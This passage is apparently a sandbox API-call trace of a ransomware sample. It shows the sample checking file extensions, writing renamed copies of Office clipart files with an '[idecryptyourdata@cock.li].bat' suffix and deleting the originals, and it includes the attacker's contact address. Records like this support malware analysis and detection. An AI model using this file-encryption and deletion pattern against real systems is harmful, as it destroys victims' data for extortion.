(lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185800.WMF") returned 68 [0198.590] lstrlenW (lpString=".zip") returned 4 [0198.590] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0198.590] lstrlenW (lpString=".rar") returned 4 [0198.590] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0198.590] lstrlenW (lpString=".bz2") returned 4 [0198.590] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0198.590] lstrlenW (lpString=".7z") returned 3 [0198.590] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0198.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185800.WMF") returned 68 [0198.590] lstrlenW (lpString=".dbf") returned 4 [0198.590] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0198.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185800.WMF") returned 68 [0198.590] lstrlenW (lpString=".1cd") returned 4 [0198.590] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0198.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185800.WMF") returned 68 [0198.590] lstrlenW (lpString=".jpg") returned 4 [0198.590] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0198.591] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.591] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.591] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187825.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187825.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0198.591] GetLastError () returned 0x0 [0198.591] ReadFile (in: hFile=0x37c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x1d4c, lpOverlapped=0x0) returned 1 [0198.593] WriteFile (in: hFile=0x340, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x1d50, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x1d50, lpOverlapped=0x0) returned 1 [0198.594] ReadFile (in: hFile=0x37c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.594] WriteFile (in: hFile=0x340, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0198.594] SetEndOfFile (hFile=0x340) returned 1 [0198.594] CloseHandle (hObject=0x340) returned 1 [0198.594] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.594] SetEndOfFile (hFile=0x37c) returned 1 [0198.595] CloseHandle (hObject=0x37c) returned 1 [0198.595] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187825.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0198.595] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187825.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187825.wmf")) returned 1 [0198.596] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187825.WMF") returned 68 [0198.596] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187825.WMF") returned 68 [0198.596] lstrlenW (lpString=".doc") returned 4 [0198.596] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0198.596] lstrlenW (lpString=".docx") returned 5 [0198.596] lstrcmpiW (lpString1=".docx", lpString2="5.WMF") returned -1 [0198.596] lstrlenW (lpString=".pdf") returned 4 [0198.596] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0198.596] lstrlenW (lpString=".xls") returned 4 [0198.596] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0198.596] lstrlenW (lpString=".xlsx") returned 5 [0198.596] lstrcmpiW (lpString1=".xlsx", lpString2="5.WMF") returned -1 [0198.596] lstrlenW (lpString=".ppt") returned 4 [0198.596] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0198.596] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187825.WMF") returned 68 [0198.596] lstrlenW (lpString=".zip") returned 4 [0198.596] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0198.596] lstrlenW (lpString=".rar") returned 4 [0198.596] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0198.596] lstrlenW (lpString=".bz2") returned 4 [0198.596] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0198.596] lstrlenW (lpString=".7z") returned 3 [0198.596] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0198.596] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187825.WMF") returned 68 [0198.596] lstrlenW (lpString=".dbf") returned 4 [0198.596] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0198.596] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187825.WMF") returned 68 [0198.596] lstrlenW (lpString=".1cd") returned 4 [0198.596] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0198.597] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187825.WMF") returned 68 [0198.597] lstrlenW (lpString=".jpg") returned 4 [0198.597] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0198.597] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.597] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.597] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187829.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187829.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0198.598] GetLastError () returned 0x0 [0198.598] ReadFile (in: hFile=0x37c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x3040, lpOverlapped=0x0) returned 1 [0198.600] WriteFile (in: hFile=0x340, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x3050, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x3050, lpOverlapped=0x0) returned 1 [0198.601] ReadFile (in: hFile=0x37c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.601] WriteFile (in: hFile=0x340, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0198.601] SetEndOfFile (hFile=0x340) returned 1 [0198.601] CloseHandle (hObject=0x340) returned 1 [0198.601] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.601] SetEndOfFile (hFile=0x37c) returned 1 [0198.602] CloseHandle (hObject=0x37c) returned 1 [0198.602] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187829.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0198.602] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187829.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187829.wmf")) returned 1 [0198.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187829.WMF") returned 68 [0198.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187829.WMF") returned 68 [0198.603] lstrlenW (lpString=".doc") returned 4 [0198.603] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0198.603] lstrlenW (lpString=".docx") returned 5 [0198.603] lstrcmpiW (lpString1=".docx", lpString2="9.WMF") returned -1 [0198.603] lstrlenW (lpString=".pdf") returned 4 [0198.603] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0198.603] lstrlenW (lpString=".xls") returned 4 [0198.603] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0198.603] lstrlenW (lpString=".xlsx") returned 5 [0198.603] lstrcmpiW (lpString1=".xlsx", lpString2="9.WMF") returned -1 [0198.603] lstrlenW (lpString=".ppt") returned 4 [0198.603] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0198.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187829.WMF") returned 68 [0198.603] lstrlenW (lpString=".zip") returned 4 [0198.603] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0198.603] lstrlenW (lpString=".rar") returned 4 [0198.603] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0198.603] lstrlenW (lpString=".bz2") returned 4 [0198.603] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0198.603] lstrlenW (lpString=".7z") returned 3 [0198.603] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0198.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187829.WMF") returned 68 [0198.603] lstrlenW (lpString=".dbf") returned 4 [0198.603] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0198.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187829.WMF") returned 68 [0198.603] lstrlenW (lpString=".1cd") returned 4 [0198.603] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0198.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187829.WMF") returned 68 [0198.603] lstrlenW (lpString=".jpg") returned 4 [0198.603] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0198.604] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.604] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.604] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187835.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187835.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0198.604] GetLastError () returned 0x0 [0198.604] ReadFile (in: hFile=0x37c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x2480, lpOverlapped=0x0) returned 1 [0198.606] WriteFile (in: hFile=0x340, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x2490, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x2490, lpOverlapped=0x0) returned 1 [0198.607] ReadFile (in: hFile=0x37c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.607] WriteFile (in: hFile=0x340, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0198.607] SetEndOfFile (hFile=0x340) returned 1 [0198.607] CloseHandle (hObject=0x340) returned 1 [0198.607] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.607] SetEndOfFile (hFile=0x37c) returned 1 [0198.608] CloseHandle (hObject=0x37c) returned 1 [0198.608] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187835.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0198.608] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187835.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187835.wmf")) returned 1 [0198.609] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187835.WMF") returned 68 [0198.609] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187835.WMF") returned 68 [0198.609] lstrlenW (lpString=".doc") returned 4 [0198.609] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0198.609] lstrlenW (lpString=".docx") returned 5 [0198.609] lstrcmpiW (lpString1=".docx", lpString2="5.WMF") returned -1 [0198.609] lstrlenW (lpString=".pdf") returned 4 [0198.609] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0198.609] lstrlenW (lpString=".xls") returned 4 [0198.609] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0198.609] lstrlenW (lpString=".xlsx") returned 5 [0198.609] lstrcmpiW (lpString1=".xlsx", lpString2="5.WMF") returned -1 [0198.609] lstrlenW (lpString=".ppt") returned 4 [0198.609] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0198.609] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187835.WMF") returned 68 [0198.609] lstrlenW (lpString=".zip") returned 4 [0198.609] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0198.609] lstrlenW (lpString=".rar") returned 4 [0198.609] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0198.609] lstrlenW (lpString=".bz2") returned 4 [0198.609] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0198.609] lstrlenW (lpString=".7z") returned 3 [0198.609] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0198.609] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187835.WMF") returned 68 [0198.609] lstrlenW (lpString=".dbf") returned 4 [0198.609] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0198.609] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187835.WMF") returned 68 [0198.609] lstrlenW (lpString=".1cd") returned 4 [0198.609] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0198.609] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187835.WMF") returned 68 [0198.609] lstrlenW (lpString=".jpg") returned 4 [0198.609] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0198.610] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.610] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.610] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187837.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187837.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0198.611] GetLastError () returned 0x0 [0198.611] ReadFile (in: hFile=0x37c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x3fe2, lpOverlapped=0x0) returned 1 [0198.612] WriteFile (in: hFile=0x340, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x3ff0, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x3ff0, lpOverlapped=0x0) returned 1 [0198.613] ReadFile (in: hFile=0x37c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.613] WriteFile (in: hFile=0x340, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0198.613] SetEndOfFile (hFile=0x340) returned 1 [0198.614] CloseHandle (hObject=0x340) returned 1 [0198.614] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.614] SetEndOfFile (hFile=0x37c) returned 1 [0198.614] CloseHandle (hObject=0x37c) returned 1 [0198.614] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187837.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0198.615] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187837.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187837.wmf")) returned 1 [0198.615] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187837.WMF") returned 68 [0198.615] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187837.WMF") returned 68 [0198.615] lstrlenW (lpString=".doc") returned 4 [0198.615] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0198.615] lstrlenW (lpString=".docx") returned 5 [0198.615] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1 [0198.615] lstrlenW (lpString=".pdf") returned 4 [0198.615] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0198.615] lstrlenW (lpString=".xls") returned 4 [0198.615] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0198.615] lstrlenW (lpString=".xlsx") returned 5 [0198.615] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1 [0198.616] lstrlenW (lpString=".ppt") returned 4 [0198.616] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0198.616] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187837.WMF") returned 68 [0198.616] lstrlenW (lpString=".zip") returned 4 [0198.616] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0198.616] lstrlenW (lpString=".rar") returned 4 [0198.616] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0198.616] lstrlenW (lpString=".bz2") returned 4 [0198.616] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0198.616] lstrlenW (lpString=".7z") returned 3 [0198.616] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0198.616] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187837.WMF") returned 68 [0198.616] lstrlenW (lpString=".dbf") returned 4 [0198.616] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0198.616] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187837.WMF") returned 68 [0198.616] lstrlenW (lpString=".1cd") returned 4 [0198.616] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0198.616] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187837.WMF") returned 68 [0198.616] lstrlenW (lpString=".jpg") returned 4 [0198.616] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0198.616] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.616] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.616] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187839.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187839.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0198.617] GetLastError () returned 0x0 [0198.617] ReadFile (in: hFile=0x37c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x14fc, lpOverlapped=0x0) returned 1 [0198.618] WriteFile (in: hFile=0x340, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0x1500, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0x1500, lpOverlapped=0x0) returned 1 [0198.619] ReadFile (in: hFile=0x37c, lpBuffer=0x3e23020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x325fecc, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesRead=0x325fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.619] WriteFile (in: hFile=0x340, lpBuffer=0x3e23020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x325fc94, lpOverlapped=0x0 | out: lpBuffer=0x3e23020*, lpNumberOfBytesWritten=0x325fc94*=0xec, lpOverlapped=0x0) returned 1 [0198.619] SetEndOfFile (hFile=0x340) returned 1 [0198.620] CloseHandle (hObject=0x340) returned 1 [0198.620] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.620] SetEndOfFile (hFile=0x37c) returned 1 [0198.620] CloseHandle (hObject=0x37c) returned 1 [0198.620] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187839.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0198.621] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187839.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187839.wmf")) returned 1 [0198.621] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187839.WMF") returned 68 [0198.621] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187839.WMF") returned 68 [0198.621] lstrlenW (lpString=".doc") returned 4 [0198.621] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0198.621] lstrlenW (lpString=".docx") returned 5 [0198.621] lstrcmpiW (lpString1=".docx", lpString2="9.WMF") returned -1 [0198.621] lstrlenW (lpString=".pdf") returned 4 [0198.621] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0198.621] lstrlenW (lpString=".xls") returned 4 [0198.621] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0198.621] lstrlenW (lpString=".xlsx") returned 5 [0198.621] lstrcmpiW (lpString1=".xlsx", lpString2="9.WMF") returned -1 [0198.622] lstrlenW (lpString=".ppt") returned 4 [0198.622] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0198.622] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187839.WMF") returned 68 [0198.622] lstrlenW (lpString=".zip") returned 4 [0198.622] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0198.622] lstrlenW (lpString=".rar") returned 4 [0198.622] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0198.622] lstrlenW (lpString=".bz2") returned 4 [0198.622] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0198.622] lstrlenW (lpString=".7z") returned 3 [0198.622] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0198.622] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187839.WMF") returned 68 [0198.622] lstrlenW (lpString=".dbf") returned 4 [0198.622] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0198.622] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187839.WMF") returned 68 [0198.622] lstrlenW (lpString=".1cd") returned 4 [0198.622] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0198.622] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187839.WMF") returned 68 [0198.622] lstrlenW (lpString=".jpg") returned 4 [0198.622] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0198.623] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.623] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x325fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.623] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187847.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187847.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0198.623] GetLastError () returned 0x0 [0198.623] ReadFile (in: hFile=0x37c, lpBuffer=0x3e23020, 